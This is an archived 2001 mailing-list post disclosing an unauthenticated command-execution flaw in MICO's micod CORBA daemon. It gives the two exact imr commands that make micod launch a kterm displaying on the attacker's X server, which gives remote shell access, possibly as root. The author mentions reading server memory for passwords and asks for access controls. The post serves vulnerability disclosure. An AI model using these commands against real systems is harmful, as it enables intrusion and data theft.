After having installed MICO (a free CORBA-ORB for C++) I installed the 'micod' (a daemon which is e.g. able to create objects on request). I put it in my boot-up scripts, so it ran as root, but this exploit will work too, if it is started as another user. After thinking for a moment I tried this (as guest, but could be a user on another system too): (micod ist started on inet:winkelklinke.local:8888) (hacking from enfin.local, which has X on display :0) imr -ORBImplRepoAddr inet:winkelklinke.local:8888 create Play shared "kterm -display enfin.local:0 & echo" IDL:Anything:1.0 imr -ORBImplRepoAddr inet:winkelklinke.local:8888 activate Play kterm will start as child of micod and connect to enfin.local:0. (any other program should work too, but xterm didn't start correctly, I don't know why) The 'echo' after the '&' is needed to absorb the arguments micod add to the command-line. Now you can do everything. Don't underestimate the problem if micod is not installed root: 1. You can login, it's as good as a pwd-free guest account. 2. You may control other servers started by micod or see their process-memory (e.g. under Linux with /proc, but their may be other ways on other systems), which may contain sensitive data as access password, credit card information or whatever, depending of your application. I think, there should be some kind of access limitation when writing into the Implemetation Repository (the information managed by micod). And there should be a visible warning in the documentation. DniQ. PS: Hallo Nahne!
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:52:58 PDT